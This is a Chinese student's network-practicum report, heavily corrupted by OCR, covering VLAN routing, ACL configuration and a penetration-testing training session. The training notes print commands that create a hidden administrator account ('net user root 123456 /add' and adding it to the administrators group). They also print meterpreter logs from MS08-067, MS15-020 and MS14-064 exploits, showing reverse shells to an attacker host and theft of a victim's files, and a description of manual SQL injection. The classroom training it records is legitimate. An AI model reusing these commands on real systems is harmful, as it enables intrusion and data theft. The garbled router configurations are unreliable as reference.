




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、1课程名称计算机网络刘铁武网络实训报告课题名称1.VLAN 间通信2.ACL标准访问控制列表指导教师2020仃年1010月仃日k k - - b b专业计算机科学与技术班级15911591学口号3636姓名何昕曦燕2湖南工程学院网络实训任务书一实训目的网络实训是学习专业技术课程所需的必要教学环节, 是所学课程内容的延伸 -将所学基本原理与实践结合,使学生所学的基础理论得到巩固,并能运用所 学理论知识解决实际问题的初步训练;进一步提高学生的分析、综合能力。 二实训的性质和任务通过实训,培养学生独立思考、综合分析与动手的能力;验证理论和加深对 概念的理解,熟练掌握网络安装和调试技术,并能综合运用知
2、识进行网络设计, 解决实际问题。对学生要求1 1.学生需认真阅读课程设计任务书,熟悉有关设计资料及参考资料,熟悉 有关各种设计规范的有关内容,认真完成任务书规定的设计内容。2 2学生均应在教师指导下,按时独立完成规定的内容和工作量。3 3书写课程设计说明书。 要求说明书准确、文字通顺、书写工整。四成绩考核及时间安排教师根据学生的平时成绩和设计内容综合评定。实训成绩按五级分评定即:优秀、良好、中等、及格、不及格。实训分成两个阶段,第一阶段(第3 3周)以课程设计形式完成;第二阶段由 众元网络、卓景等单位工程师进行实用范例讲解和训练。第3 3周星期一星期二星期三星期四星期五上午课题讲解自习上机自习
3、上机下午上机上机答辩星期一星期二星期三星期四星期五上午众元众元众元撰写报告下午众元众元众元卓景撰写报告五实训要求1.1. 每生至少完成2 2题,其中必选题是学号 modmod 6+1;6+1;另任选一题。2.2. 无实验报告记不及格,实验报告正文见附录说明。 六实训内容3第一阶段课题1 1:路由器实现VLANVLAN间通信 实验内容首先连接实验拓扑图,然后创建vian10vian10和vian20vian20,接着进行讲交换机端口分配给vlanvlan和配置交换机的trunktrunk端口,完成上述步骤后,进行配置路由器子接口。最后配置电脑,进行调试。宀r rPC-PTPC-PTPC3PC31
4、92192 1I&81I&8 2 2 0/240/24课题4 4:局域网的访问控制之 ACLACL标准访问控制列表FaDi/lFaDi/lVIAHVIAH 00r r241241 FaD/ltertFaD/ltertfaO/5faO/5 aO/4aO/4PC-PC- PTPTPC2PC2z z PC-FTPC-FTPCO101G81G8 1 1 0/240/24PC-PTPC-PTPCIPCIF F3 3bwitchObwitchO-24的3 3个网段,三部门之间用路由器进行信息传递, 销售部门PC2PC2不能对财务部门 进行访问。PC1PC1 、1 1佗 16.16. 1 -如严 172,1
5、72, 16.16. 3 3 1/241/24I I 七 f f 5151 _ _172,172, IBIB 1.1.1 1DCE sO/0/0lO/O/OilO/O/Oi172.16. 3./42811# # RouteRoute rlrlX aO/l/ /172.172. 16.2,16.2, 1 1ftDZO 172. 16.4. 1/24A A2611RouteRoute r2r2t t t tP C-PTPC3PC3172.172. 1515 4.24.2实验内容你是一个公司的网络管理员,公司的经理部、财务部门和销售部门分属不同 为了安全起见,公司领导要求PC3PC3进行访问,但经理
6、部PC1PC1可以对财务部门PC3PC3_ _* JP P C-PTC-PT172. ie.e/245第二阶段实用范例:XX县电子政务网信息安全渗透测试方案训练目标1.网络平台的搭建技术2.渗透靶子机搭建技术3.渗透测试之信息收集的使用方法4.内网渗透测试方法与原理5.6.设备和window系统密码爆破原理及使用方法 嗅探敏感信息的使用技巧7.通信协议的欺骗技术及网络威胁8.Nessus系统扫描技术9.AWVS网站扫描技术10.Web SQL注入攻击原理与利用11.Web XSS攻击的原理与利用12.13.DDOS攻击的原理与利用Kali之主机渗透技文档要求:提交不少于10001000字实训项
7、目及学习体会方案文档WEBWEB, , FTPFTP屮CS_H_5W_CJ75QCS_H_5W_CJ75QH H网络核心金丿9 9 Itilernet-Itilernet- 7 7二J网貉边界区F F41 瞌 lOOU接1诫* P4P4韶月斓S S鞄子 _网fc接入靶子区-鼻 J J SWSW CMCM sesecscs J J SWSW C29C29盼来宾子机区 PCPC55 PC6-PC6-员工瓠郭于机PCPC PC4PC4財务部PCVPCV PC2PC2674.11课题一:路由器实现VLAN间通信1. 课题内容2. 实现原理3拓扑结构图4实现步骤5调试结果及分析 课题二:ACL标准访问控
8、制列表1. 课题内容2. 实现原理3拓扑结构图4实现步骤5调试结果及分析 第二阶段学习报告 参考资料 评分表1而路由器或是三层交换机可以在不同网VLAN2VLAN2的主机可以通过路由器将数据包转发给VLAN3VLAN3课题一:路由器实现 VLANVLAN间通信1、课题内容首先连接实验拓扑图,然后创建 vian10vian10和vian20vian20 ,接着进行讲交换机端口 分配给vlanvlan和配置交换机的trunktrunk端口,完成上述步骤后,进行配置路由器子 接口。最后配置电脑,进行调试。2、实现原理不同VLANVLAN之间通过二层交换机是无法通信的,因为 VLANVLAN之间处于不
9、同网 段,交换机只将报文转发至相同的网段, 络之间转发数据包,所以 的主机实现相互通信。3、拓扑结构图24、实现步骤(1(1)创建 VLANVLAN单击交换机,在弹出的对话框选择命令行,在命令行中输入SwixchtvlanSwixchtvlan databasedatabase土 WarningWarning: ItIt isis tectec口zoneiiiiedzoneiiiied ZoZo configureconfigure VLANVLAN frcmfrcm cmnfigcmnfig iDodeiDode agag VTANVTAN ditahaseditahase memedede
10、 isis beingsbeings deprecated.deprecated. PleasePlease consultconsult useruser dede cuEificuEifi ntnt atat i i cncn forfor configuringconfiguring VTP/VLANVTP/VLAN inin configconfig memedede. .Switchvlan#vlanSwitchvlan#vlan 1010 naxsnaxs mathmathVLMJVLMJ lala added:added:N N切e e : : niAthniAthSuitSui
11、t chifvlsnjchifvlsnj #vlan#vlan 2020 najoenajoe chinechine a a e eVLAWVLAW 2020 added:added:KajneKajne : : ChineseChineseSwitch(vlan)#exiSwitch(vlan)#exi匸(2(2)把交换机端口分配给 VLANVLANSwitchtconfSwitchtconf t tEnterEnter configurationconfiguration conunands,conunands, oneone perper line,line, SndSnd withwi
12、th OTTL/2OTTL/2, , EwitctLfJeonrig)EwitctLfJeonrig) tinttint rang#rang# faD/2-3faD/2-3SvitcliiCcQnfig-if-EangeSvitcliiCcQnfig-if-Eange J J tavitciipcrttavitciipcrt meme dede accessaccessSvitckiJcQnfSvitckiJcQnf ig-if-Eangeig-if-Eange J J fravitchpcEtfravitchpcEt accessaccess vlanvlan 1010界ituhtgcanf
13、ig-if-EangeJituhtgcanfig-if-EangeJ intint tingetinge fatJ/4-5fatJ/4-5SwitchSwitch config-lf-cangeconfig-lf-cange lsvictiportlsvictiport modemode accessaccessSwitchconfig-if-cange)awitchpoECSwitchconfig-if-cange)awitchpoEC accessaccess vlanvlan 2020EvritcliEvritcli ( (confconf ig-if-rangeig-if-range
14、1 1 #exit#exit(3(3)配置交换机trunktrunk端口RouterRouter CDrLrig-if rencapulaclonrencapulaclon doclQdoclQ 2020RouterRouter confconf ig-aubiig-aubi f f IfIf ipip addressaddress 132.1E3.S.1132.1E3.S.1 2SS2SS . .;SS_25SSS_25S . . 0 0Routerconfig-3ubif#in.tRouterconfig-3ubif#in.t?Louter?Louter iconfig-3Ulif f)
15、)# #ipip AddresaAddresa4 4 55*255,266,055*255,266,0RouterRouter CQiifig-auiifCQiifig-auiif) ) #exit#exitRouterRouter cDiifig)cDiifig) IrintIrint faO/1faO/1StouterStouter CDnig-ifpingPCping withwith 3232ofof data:data:= =1 1 fZ5fZ5韦 1039,1039, AppEOKimateAppEOKimate roundround r
16、iprip timestimes inin milli-aecondamilli-aeconda: : ftiniEUEftiniEUE = = O OJUSJUS, , MaximuinMaximuin = = Oms,Oms, AvecageAvecage = = QmsQmsRequest;Request;ReplyReply fromfrom 13S_16S_.3z13S_16S_.3zReplyReply fromfrom 192_160_2.3:192_160_2.3:ReplyReply fromfrom 19S.iea.2.3;19S.iea.2.3;tijnedtijned
17、out.out.byl;e3=3byl;e3=3 byte3=32byte3=32 byte3=32byte3=32t t jjnejjne =03113=03113 tijEie=03natijEie=03na t t Jjn)e=03naJjn)e=03naTTT17TTT17TTL=127TTL=127TTL=127TTL=1274%丁 消售JT1 1、课题内容2 2、实现原理ACLACL末尾都有隐藏的隐含拒绝语句。2BL1R&uterL*3P P 匚-PT-PTPC2财劳祁 172.16.课题二:局域网的访问控制之 ACLACL访问控制列表你是一个公司的网络管理员,公司
18、的经理部、财务部门和销售部门分属不同 的3 3个网段,三个部门之间用路由器进行信息传递, 为了安全起见,公司领导要 求销售部门PC2PC2不能对财务部门PC3PC3进行访问,但经理部PC1PC1可以对财务部门 PC3PC3进行访问。ACLACL技术在路由器中被广泛采用,它是一种基于包过滤的流控制技术。标准 访问控制列表通过把源地址、目的地址及端口号作为数据包检查的基本元素, 并 可以规定符合条件的数据包是否允许通过。 ACLACL通常应用在企业的出口控制上, 可以通过实施ACLACL可以有效的部署企业网络出网策略。随着局域网内部网络资 源的增加,一些企业已经开始使用ACLACL来控制对局域网内
19、部资源的访问能力, 进 而来保障这些资源的安全性。ACLACL 能执行两个操作:允许或拒绝。语句自上而下执行。一旦发现匹配, 后续语句就不能进行处理一因此先后顺序很重要。如果没有找到匹配,ACLACL末尾不可见的隐含拒绝语句将丢弃分组。一个 ACLACL应该至少有一条PermitPermit语句;否 则所有流量都会丢弃,因为每个经理篩 1T2.1S. 1.29k、PC0 、jf RouterO/3 3、拓扑结构图5(1(1)配置RouterORouterO的静态路由条目買口 utecutec ( (czanfczanf igig f f interfaceinterface FistZtheE
20、netFistZtheEnetaciuteEaciuteE lconfigiflconfigif #ip#ip addresaaddresa ZSS.ZSS.O.aZSS.ZSS.O.a 丸口u u匸営 confi-ifconfi-if J JI I# #TouterTouter I I confconf ig-ifig-if # #eKiteKitRouter(config)interfaceRouter(config)interface FestZthernet0/1FestZthernet0/1Routec(config-ifRoutec(con
21、fig-ifJ Jinoino ipip m日dcesmdcesmPouterPouter f fconfig-ifconfig-if 4f4fRoutecRoutec f fcenfig-iz)cenfig-iz)#exit#exitRcut&ERcut&E Cccnrig)Cccnrig)#interface#interface FiatZthernetFiatZthernet/louterlouter (,CDnrig-iz(,CDnrig-iz:i i #ip#ip addressaddress 1212 . . Iff.Iff. 1.1.1 1 SSSSSS . . 255255.
22、.255255. .0 0 fQuterfQuter f f ccnig-ifccnig-if J J # #丸ciuteEciuteE f f ccnig-ifccnig-if) ) texittexit兗 ciiiteEciiiteE config)config) finlLerfacefinlLerfacetithetithe metmet 0/10/1aauteraauter tconfig-ifHiptconfig-ifHip addresaaddresa 172.1,2.1172.1,2.1 55.:SSSS.0.0ScnjceEScnjceE ( ( c
23、onfconf ig-ifig-if oucecoucec( (config-ifconfig-if #eKit#eKitR RQUCGEQUCGE tuantl.?)tuantl.?) finfacefinface EerlalO/3/0EerlalO/3/0RouterRouter (conf(conf ig-ifig-if :* * #ip#ip addressaddress 172.1,3.1172.1,3.1 25S25S . . Z55Z55 . . .0 0RoutecRoutec #eKit#eKitoutout erer (config(config 1 1 TipTip r
24、outeroute 172172 . . ie.4.0ie.4.0 S&SS&S ,555,2S5,0,555,2S5,0 1717;.16,3-2.16,3-2 jlout&Ejlout&E jqpnWgg)jqpnWgg) j j(2(2)配置RouterlRouterl的静态路由条目買口 utecutec ( ( config)config) f f interfaceinterface FsmtitheEnetFsmtitheEnet 0/00/0afluretafluret (Udnfig(Udnfig;Lf;Lf;LpLp addressaddress 172.1,1.1172.1
25、,1.1 25.25. 255.0.0255.0.0 丸口ut&Eut&E ( (confconf1 1PouterPouter f fconfig-ifconfig-if #eKit#eKit3,outeE3,outeE ccenfig)ccenfig) interfaceinterface FststheEnetFststheEnet0/10/1RoutecRoutec (conf(conf ig-ifig-if lili #no#no ipip addcemmaddcemmHoutecHoutec fconfig-iffconfig-if? ?# #SoutecSoutec t t e?
26、enfig-ie?enfig-i f f) ) # # exitexitRcutftERcutftE i i cenrcenrig)#interfaceig)#interface FiatZthernetFiatZthernet/uteruter (,conzig-iz(,conzig-iz:iiii #i#ip p addxesaaddxesa 1*721*72 . . IffIff. . 1.1.1 1 2=2= . . 23s23s . . 2S52S5. .0 0 utL&EutL&E f f ccnfccnf ig-ifig-if J J # #丸ciuteEciuteE f f c
27、cnfig-ifccnfig-if J J texittexit貨 QuteEQuteE ca-nigca-nig f f interfaceinterface FsmFsm tithetithe metmet 0/10/1aauteraauter IcronfIcronfig-ifig-if HipHip addreaaaddreaa 172.1.2.1 丸cnjcefcnjcef confconf ig-ifig-if # #:%:%oucecoucec f fconfi5-ifconfi5-if RouteERout
28、eE ccnfig)tinerfaceccnfig)tinerface SerialO/3/0SerialO/3/0Rautec(config-ifRautec(config-if? ?#ip#ip addressaddress 172.1,3.1172.1,3.1 25S25S. .5555. .5555.0.0 stouterstouter ( (config-config-ifif 4feKit4feKitstouterstouter f f configconfig 1 1 FipFip routeroute 172172 . . ie.4.0ie.4.0 2&S2&S”4S5”0”4
29、S5”0 17.16,3-217.16,3-2UtGEUtGE cpnrig)fcpnrig)f(3(3) RouterlRouterl拒绝网段2.02.0和允许网段1.01.0的流量通过3.out&E3.out&E ,HOiindHOiind一triptrip min/avg/maxmin/avg/max = = 1/34/6S msms,, tirrieQUttirrieQUt isis 2 2 secondsseconds: :第二阶段学习报告课设体会一今天,来自长沙众元网络科技有限公司的负责人来为我们讲了一天有关网络 安全方面的知识。首先,上
30、午,他们给我们介绍了有关漏洞方面的知识,并让我 们试着做了一个小小的练习一一关于 MS08-067MS08-067漏洞的利用。这个练习最关键的 地方就是虚拟机的使用。C:WlNDWS5y5teni32netC:WlNDWS5y5teni32net useruser rootroot 123456123456 /add/add netnet useruser rootroot 123456123456 /add/addTheThe commandcommand completedcompleted successfLilly.successfLilly.C:WIND0WSsystem32net
31、user netnet Li$eLi$e rUserUser accountsaccounts for - - -beef-ttibeef-tti f f rameworhrameworh -Aclmirusti dtordtordenglangdenglangGuestGuestHelpAssistantHelpAssistantrootrootSUPPORTSUPPORT 3805453038054530TheThe commandcommand completedcompleted withwith oneone oror moremore errors.errors.C:WlNDClW
32、S&ysteni32netC:WlNDClWS&ysteni32net locelgrouplocelgroup administratorsadministrators rootroot /add/add netnet localgrouplocalgroup administratorsadministrators rootroot /add/addTheThe cominandcominand completedcompleted successTtilly.successTtilly.C C WirJD0WSsystem32-A|WirJD0WSsystem32-A|下午,我们便是做了
33、防火墙的实验。防火墙是为了解决网络上黑客攻击问题 而研制的个人信息安全产品,具有比较完备的规则设置,能够有效的监控大多数 网络连接,保护网络不受黑客的攻击。在实验中,我们用两台路由器来代替PCPC机,分别表示内网和外网,防火墙的作用便是内网能够PingPing通外网,但是外网不能PingPing通内网。内网PingPing通外网外网PingPing不通内网R2tping 192,168.1.1TypeType escapeescape sequencesequence to atooratoor匸.Sending 5, 100-byte100-byte ICMP Echos toSuccess
34、 rate is 0 percent (0/5)R2f|R2f|从今天一天的情况来看,我还是能够跟上进度,每个实验都能独立完成,并 且学到了一点有关漏洞和防火墙的知识,总之,这一天的收获不错。8课设体会二钓鱼网站是指伪装成银行及电子商务,窃取用户提交的银行账号、密码等私 密信息的网站,不法分子利用各种手段,仿冒真实网站的 URLURL地址以及页面内 容,或利用真实网站服务器程序上的漏洞在站点的某些网页中插入危险的 HTMLHTML 代码,以此来骗取用户银行或信用卡账户、密码等私人资料。9习。我们通过虚拟机、 主机的数据。201709-262017-09-262017-09-262017-09-
35、2610:4210:4210:3210:422啊敢 0 llLtxt0 cjh.txt0镯2 褊95,687,602,176 诚昨E:exit exit meterp厂ete * downloading: E:/cjh*txt *I download下午我们做了外网渗透XPXP系统测试,其中,我们设置了一台主机,一台黑 客,两台XPXP系统,我们使用MS15-020MS15-020快捷方式漏洞来使黑客机通过 URLURL网址 先控制主机,然后又在两台 XPXP访问主机的共享文件时,黑客通过渗透侵入 XPXP 系统,从而窃取XPXP系统中的数据文件。I I血 exploltCexploltC L
36、 L.I.I ) ) sessionssessionsUctlveUctlve sessionssessionsIdId TypTyp nnectionnnectionIriTomatlonIriTomatlonI I meterpretermeterpreter xS6/win32xS6/win32 ZHmSYUAZHmSYUA- -2B9ASDAOiunxstra10r2B9ASDAOiunxstra10r ZHOHGYUAZHOHGYUA ?B9A(?B9A( 2.2. lefl.lW.lefl.lW. 128:4444128:4444 亠 192.IM.192.IM. leO.leO.
37、 142;142; 19611961 (192,(192, l&S.l&S. 139.1421139.1421milmil exploitexploitI I * * 3 3 StartingStarting interactioninteraction wittiwitti 1-.1-.I I sessionssessions -1-1 1 1nietcnietcp pgtegte shellshell processprocess 1313關createdcreated ChannelChannel 1 1 created,created, HicrosoftHicrosoft Windo
38、wsWindows XPXP 薜汾 S.L?6aQ)S.L?6aQ)今天上午,我们就钓鱼攻击的相关知识进行了学习,并进行了一次相关的练 WindowsWindows等相关用户进行试验,使黑客通过 URLURL来窃取10逐 expVoit(rii?expVoit(rii? auhQBAcNTfwauhQBAcNTfwI*I*r *1*1 UsingUsing URLURL: httphttp;?/G.O,O.0?/G.O,O.0:8GBeytz8GBeytzjnsjnsf fatexploitexploit (ms(ms 14_35-_ie_c14_35-_ie_ GatheringGather
39、ing tergetterget InforniationInforniation forfor 192168249.130192168249.130SendingSending HTMLHTML responseresponse toto 3030SendingSending exploitexploitSendingSending stagestage (957599(957599 bytes)bytes)MeterpreterMeterpreter sessionsession 1 1 openedopened 2017-09-2720
40、17-09-27 曲:别:别 +0000+0000toto 3030(192*lb&*249*129:4444(192*lb&*249*129:4444 - 192-168-249-130:49230)192-168-249-130:49230)msfGXplOLt ( !.L _ C C i-StartingStarting interactioninteraction withwith 1 1 sessionsessions s -i-i 1 1ServiceService PxkPxk 1).1).mgmg *小服刃用冷/ / : :C
41、LCL:Ej.n.Z3Ej.n.Z3咙?旳J门fl眸吏n: KICTICT nznz课设体会三今天是第三天了,上午,我们进行了MS14-06MS14-064 4漏洞测试,这是在 WindowsWindows 7 7上进行的实验。LocalLocal IP:IP: httphttp: :/ig?.163/ig?.163- -249.129249.129: :SGSO/tzauheBAcNTfwSGSO/tzauheBAcNTfw ServerServer started.started.meterpfetermeterpfeter sy&infosy&infoComputerComputer:
42、: WIN-OGPTD7B30K7WIN-OGPTD7B30K7OSOS: : WindowsWindows 7 7 (Build(Build 7601,7601,ArchitectureArchitecture : : xG6xG6SystemSystem LanguageLanguage : : zhzh CNCNDomainDomain: : WORKGROUPWORKGROUPLoggedLogged OnOn UsersUsers : : 1 1HeteroreterHeteroreter : : x86Zwin32x86Zwin32下午,我们对网页(静态页面 HTMLHTML动态页
43、面 WAFWAF进行了手工SQLSQL注入, SQLSQL注入,就是通过把SQLSQL命令插入到WebWeb表单提交或输入域名或页面请求的查 询字符串,最终达到欺骗服务器执行恶意的SQL命令。它是利用现有应用程序, 将(恶意的)SQLSQL命令注入到后台数据库引擎执行的能力, 它可以通过在WebWeb表单 中输入(恶意)SQLSQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQSQL L语句。因此,我们用老师所给的公司企业源码进行了一次手 工SQLSQL注入的实验。乐飙TTTT: IQIQ iniini IIII m mmrrimrri 和i i曲qei*qei*的ITIT角冏低血出turnerturner:心g=tU=tU: ciUkTiciUkTi D D CobLiLbhCobLiLbh BEBE T T . TibWETibWE VTVT t.t. I I mHmH TriTri如L L叫
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 古代手工业经济与宗教服饰研究合同
- 2025年工业互联网平台增强现实交互技术在人工智能与智慧安防人脸识别中的应用报告
- 2025年零售行业数字化供应链协同与供应链金融创新模式报告
- 文化旅游融合发展示范区资金申请报告:2025年旅游市场细分与精准营销策略
- 大数据隐私保护在医疗行业数据治理合规应用中的实践与启示报告
- 2025年辅警招聘考试题库和参考答案
- 2025年辅警招聘考试试题库附完整答案(夺冠系列)
- 畜牧饲养责任与安全保障合同
- 水域环境监测服务合同
- 电子商务平台SEO优化及推广服务协议
- 驿站快递合同协议书
- 华润守正评标专家考试试题及答案
- 食品公司销售管理制度
- 牙周炎培训课件
- DB51-T 3171-2024 四川省体育服务综合体等级划分
- 大学生职业发展与就业指导-09成功转换角色与适应职场环境
- 活检钳取病理应用
- 丝绸之路的开拓者张骞人物介绍
- 餐饮店铺装修拆除方案
- 夜市街规划设计方案
- 大众点评网商业模式分析主要服务方式
评论
0/150
提交评论